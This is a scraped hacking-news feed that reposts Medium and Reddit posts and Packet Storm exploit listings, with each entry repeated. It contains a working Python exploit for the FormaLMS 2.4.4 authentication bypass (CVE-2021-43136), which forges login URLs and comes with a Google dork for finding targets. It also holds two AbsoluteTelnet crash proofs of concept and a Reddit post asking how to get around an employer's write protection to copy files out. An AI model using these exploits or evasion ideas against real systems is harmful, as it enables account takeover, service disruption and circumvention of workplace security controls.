Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
14 nuevas fallas de seguridad encontradas en la utilidad BusyBox Linux para dispositivos integrados
https://cdn-images-1.medium.com/max/1600/0*qD-cY_rpEm_oE5Oh
PUBLICADO EN 11 NOVIEMBRE, 2021 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
14 nuevas fallas de seguridad encontradas en la utilidad BusyBox Linux para dispositivos integrados
https://cdn-images-1.medium.com/max/1600/0*qD-cY_rpEm_oE5Oh
PUBLICADO EN 11 NOVIEMBRE, 2021 POR EHACKING
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
14 nuevas fallas de seguridad encontradas en la utilidad BusyBox Linux para dispositivos integrados
PUBLICADO EN 11 NOVIEMBRE, 2021 POR EHACKING
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
4 Risky bugs to report to bounty programs
https://cdn-images-1.medium.com/max/2600/1*ousrc_qDd9SO3Xd6Wfsacw.jpeg
Bugs that you should avoid or reconsider before reporting to programs.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
4 Risky bugs to report to bounty programs
https://cdn-images-1.medium.com/max/2600/1*ousrc_qDd9SO3Xd6Wfsacw.jpeg
Bugs that you should avoid or reconsider before reporting to programs.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
4 Risky bugs to (not)report to bounty programs
Bugs that you should avoid or reconsider before reporting to programs.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hunt or Be Hunted: Threat Hunting and Deception Networks to Stop Hackers Before They Act
https://cdn-images-1.medium.com/max/1430/1*F0QGNFizjmJkwDdvhIs-TA.jpeg
Developed from the ProThink Learning Course Cybersecurity Habits Every Employee Should Master
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Hunt or Be Hunted: Threat Hunting and Deception Networks to Stop Hackers Before They Act
https://cdn-images-1.medium.com/max/1430/1*F0QGNFizjmJkwDdvhIs-TA.jpeg
Developed from the ProThink Learning Course Cybersecurity Habits Every Employee Should Master
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hunt or Be Hunted: Threat Hunting and Deception Networks to Stop Hackers Before They Act
Developed from the ProThink Learning Course Cybersecurity Habits Every Employee Should Master
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
PEN TESTER LAB : SESSION INJECTION WALK-THROUGH
https://cdn-images-1.medium.com/max/723/1*Mpjy9jawUb8IAeLwz9bHbw.png
IN THIS VM OR LAB WE SEE HOW TO HACK THE PEN TESTER LAB :SESSION INJECTION LAB AND SEE WHAT TYPE OF VENERABILITY.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
PEN TESTER LAB : SESSION INJECTION WALK-THROUGH
https://cdn-images-1.medium.com/max/723/1*Mpjy9jawUb8IAeLwz9bHbw.png
IN THIS VM OR LAB WE SEE HOW TO HACK THE PEN TESTER LAB :SESSION INJECTION LAB AND SEE WHAT TYPE OF VENERABILITY.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
PEN TESTER LAB : SESSION INJECTION WALK-THROUGH
IN THIS VM OR LAB WE SEE HOW TO HACK THE PEN TESTER LAB :SESSION INJECTION LAB AND SEE WHAT TYPE OF VENERABILITY.
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
American spy hacked Booking.com, company stayed silent
https://external-preview.redd.it/86ZkEHfqbzsf6uyw_Y97kd9OVE9rfJYdTdew7hInz8w.jpg?width=640&crop=smart&auto=webp&s=9076b3763f439f18dfbd84b531dff3faa2542d0a submitted by /u/pcaversaccio
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
American spy hacked Booking.com, company stayed silent
https://external-preview.redd.it/86ZkEHfqbzsf6uyw_Y97kd9OVE9rfJYdTdew7hInz8w.jpg?width=640&crop=smart&auto=webp&s=9076b3763f439f18dfbd84b531dff3faa2542d0a submitted by /u/pcaversaccio
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
American spy hacked Booking.com, company stayed silent
Posted in r/hacking by u/pcaversaccio • 1 point and 1 comment
hacking: security in practice
fcrackzip and rockyou.txt question
I'm trying my hands at a hackable VM, but I'm running into a slight problem that maybe someone here knows the answer to.
One step in the hackable VM is to trick the machine into sending me an encrypted zip. I zipped it using a password near the end of rockyou.txt
when I try fcrackzip and using a test dictionary with only the password, it seems to work, but when I run fcrackzip, it runs for 30 seconds, then goes back to the command line without the password. Is there a way of forcing it to run for longer? It's my thought that because it's near the end of the list, fcrackzip isn't reaching it.
If this isn't the place to post this, let me know and I'll take this post down
submitted by /u/SammyQuinnHopps
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
fcrackzip and rockyou.txt question
I'm trying my hands at a hackable VM, but I'm running into a slight problem that maybe someone here knows the answer to.
One step in the hackable VM is to trick the machine into sending me an encrypted zip. I zipped it using a password near the end of rockyou.txt
when I try fcrackzip and using a test dictionary with only the password, it seems to work, but when I run fcrackzip, it runs for 30 seconds, then goes back to the command line without the password. Is there a way of forcing it to run for longer? It's my thought that because it's near the end of the list, fcrackzip isn't reaching it.
If this isn't the place to post this, let me know and I'll take this post down
submitted by /u/SammyQuinnHopps
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
fcrackzip and rockyou.txt question
I'm trying my hands at a hackable VM, but I'm running into a slight problem that maybe someone here knows the answer to. One step in the...
Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
How to get a text file from a computer that has writing protection enabled?
I sometimes use my work computer to do some outside work during down time. I only use .txt files. Recently they put some kind of writing protection on all the computers. The security-approved USBs that they issued now only work to copy from the USB to computer, not the other way around. Phones don't connect and DVDs are not recognized. The computer is not connected to the internet. I can use a photo text extractor and just photograph the document, but it has some errors. Ultimately I could also bring my personal laptop and do it, but I would rather not, if possible.
So the question is- how can I get that text file out?
What I've tried:
• connecting the work-issued USB stick : I can open it, I can copy documents from it, but when I try to copy to it/rename/whatever, a window pops up asking for permission ("Destination Folder Access Denied - You need to confirm this operation" and I need to enter the admin username and password if I press continue)
• connecting a phone via cable: this used to work since it wasn't technically an USB. Now it shows the phone but when I double click it says no permission to access device and it won't open
• burning to a CD: it used to work, but now it says "could not find any recorders that support recording"
Any ideas? I found this article - https://www.windowscentral.com/how-enable-write-protection-usb-devices-windows-10 and maybe I can do it in reverse, IF this is how they did it. But if not, I am at a loss.
Any thoughts? Thanks!
submitted by /u/AgressivePurple
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
How to get a text file from a computer that has writing protection enabled?
I sometimes use my work computer to do some outside work during down time. I only use .txt files. Recently they put some kind of writing protection on all the computers. The security-approved USBs that they issued now only work to copy from the USB to computer, not the other way around. Phones don't connect and DVDs are not recognized. The computer is not connected to the internet. I can use a photo text extractor and just photograph the document, but it has some errors. Ultimately I could also bring my personal laptop and do it, but I would rather not, if possible.
So the question is- how can I get that text file out?
What I've tried:
• connecting the work-issued USB stick : I can open it, I can copy documents from it, but when I try to copy to it/rename/whatever, a window pops up asking for permission ("Destination Folder Access Denied - You need to confirm this operation" and I need to enter the admin username and password if I press continue)
• connecting a phone via cable: this used to work since it wasn't technically an USB. Now it shows the phone but when I double click it says no permission to access device and it won't open
• burning to a CD: it used to work, but now it says "could not find any recorders that support recording"
Any ideas? I found this article - https://www.windowscentral.com/how-enable-write-protection-usb-devices-windows-10 and maybe I can do it in reverse, IF this is how they did it. But if not, I am at a loss.
Any thoughts? Thanks!
submitted by /u/AgressivePurple
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
How to get a text file from a computer that has writing protection...
I sometimes use my work computer to do some outside work during down time. I only use .txt files. Recently they put some kind of writing...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
FormaLMS 2.4.4 Authentication Bypass
https://3.bp.blogspot.com/-BKQJl1oXbqE/WWlvQjSZMJI/AAAAAAAAINE/UWb7sXt4uvssyXVrWpwrINbeIcIr93_vACLcBGAs/s1600/h33.png
FormaLMS versions 2.4.4 and below suffer from an authentication bypass vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
FormaLMS 2.4.4 Authentication Bypass
https://3.bp.blogspot.com/-BKQJl1oXbqE/WWlvQjSZMJI/AAAAAAAAINE/UWb7sXt4uvssyXVrWpwrINbeIcIr93_vACLcBGAs/s1600/h33.png
FormaLMS versions 2.4.4 and below suffer from an authentication bypass vulnerability.
MD5 |
2b3e4ad97facc1c98739b4b6cc6e66e2Download
# Exploit Title: FormaLMS 2.4.4 - Authentication Bypass
# Google Dork: inurl:index.php?r=adm/
# Date: 2021-11-10
# Exploit Author: Cristian 'void' Giustini @ Hacktive Security
# Vendor Homepage: https://formalms.org
# Software Link: https://formalms.org
# Version: <=
# Tested on: Linux
# CVE : CVE-2021-43136
# Info: An authentication bypass issue in FormaLMS <=
# Analysis:
https://blog.hacktivesecurity.com/index.php/2021/10/05/cve-2021-43136-formalms-the-evil-default-value-that-leads-to-authentication-bypass/
# Nuclei template:
https://gist.github.com/hacktivesec/d2160025d24c5689d1bc60173914e004#file-formalms-authbypass-yaml
#!/usr/bin/env python
"""
The following exploit generates two URLs with empty and fixed value of the "secret". In order to achieve a successful exploitation the "Enable SSO with a third party software through a token" setting needs to be enabled
"""
import sys
import time
import hashlib
secret = "8ca0f69afeacc7022d1e589221072d6bcf87e39c"
def help():
print(f"Usage: {sys.argv[0]} username target_url")
sys.exit()
if len(sys.argv) < 3:
help()
user, url = (sys.argv[1], sys.argv[2])
t = str(int(time.time()) + 5000)
token = hashlib.md5(f"{user},{t},{secret}".encode()).hexdigest().upper()
final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
print(f"URL with default secret: {final_url}")
token = hashlib.md5(f"{user},{t},".encode()).hexdigest().upper()
final_url = f"{url}/index.php?login_user={user}&time={t}&token={token}"
print(f"URL with empty secret: {final_url}")
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
FormaLMS 2.4.4 Authentication Bypass
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Microsoft Windows WSAQuerySocketSecurity AppContainer Privilege Escalation
https://2.bp.blogspot.com/-209TE5VbJR0/WWlvlKjkdxI/AAAAAAAAIQ8/gHk0ahoua8cqyTuIh5dYs6hAVa_ekYeoACLcBGAs/s1600/hack_img.png
The WSAQuerySocketSecurity API returns full anonymous impersonation tokens for connected peers in an AppContainer leading to a sandbox escape.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Microsoft Windows WSAQuerySocketSecurity AppContainer Privilege Escalation
https://2.bp.blogspot.com/-209TE5VbJR0/WWlvlKjkdxI/AAAAAAAAIQ8/gHk0ahoua8cqyTuIh5dYs6hAVa_ekYeoACLcBGAs/s1600/hack_img.png
The WSAQuerySocketSecurity API returns full anonymous impersonation tokens for connected peers in an AppContainer leading to a sandbox escape.
MD5 |
ade1ded7ab08f8d11cd681665642d7eaDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Microsoft Windows WSAQuerySocketSecurity AppContainer Privilege Escalation
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Apache HTTP Server 2.4.50 Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Apache HTTP Server 2.4.50 Remote Code Execution
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Apache HTTP Server 2.4.50 Remote Code Execution
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
AbsoluteTelnet 11.24 Denial Of Service
https://3.bp.blogspot.com/-m8d6k5PvpEU/WWlvYbY80xI/AAAAAAAAIOk/9YRDlN0af5krj_sxTfYJBUTX80Cs4dJKgCLcBGAs/s1600/h56.png
AbsoluteTelnet version 11.24 suffers from multiple denial of service vulnerabilities.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
AbsoluteTelnet 11.24 Denial Of Service
https://3.bp.blogspot.com/-m8d6k5PvpEU/WWlvYbY80xI/AAAAAAAAIOk/9YRDlN0af5krj_sxTfYJBUTX80Cs4dJKgCLcBGAs/s1600/h56.png
AbsoluteTelnet version 11.24 suffers from multiple denial of service vulnerabilities.
MD5 |
c4916606f4a527de1d97ff6c1c0f4553Download
# Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-10
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link : https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
# Tested Version: 11.24
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
# Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & license name Denial of Service (PoC)
# Steps to reproduce:
# 1. - Download and install AbsoluteTelnet
# 2. - Run the python script and it will create exploit.txt file.
# 3. - Open AbsoluteTelnet 11.24
# 4. - "new connection file -> DialUp Connection
# 5. - Paste the characters of txt file to "DialUp -> phone"
# 6. - press "ok" button
# 7. - Crashed
# 8. - Reopen AbsoluteTelnet 11.24
# 9. - Copy the same characters to "license name"
# 10.- Click "Send Error Report" button
# 11.- Crashed
#!/usr/bin/python
exploit = 'A' * 1000
try:
file = open("exploit.txt","w")
file.write(exploit)
file.close()
print("POC is created")
except:
print("POC not created")
------
# Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-10
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
# Tested Version: 11.24
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
# Description: AbsoluteTelnet 11.24 - 'SHA1/SHA2/Username' and 'Error Report' Denial of Service (PoC)
# Steps to reproduce:
# 1. - Download and install AbsoluteTelnet
# 2. - Run the python script and it will create exploit.txt file.
# 3. - Open AbsoluteTelnet 11.24
# 4. - "new connection file -> Connection -> SSH1 & SSH2"
# 5. - Paste the characters of txt file to "Authentication -> Username"
# 6. - press "ok" button
# 7. - Crashed
# 8. - Reopen AbsoluteTelnet 11.24
# 9. - Copy the same characters to "Your Email Address (optional)"
# 10.- Click "Send Error Report" button
# 11.- Crashed
#!/usr/bin/python
exploit = 'A' * 1000
try:
file = open("exploit.txt","w")
file.write(exploit)
file.close()
print("POC is created")
except:
print("POC not created")
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
AbsoluteTelnet 11.24 Denial Of Service
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.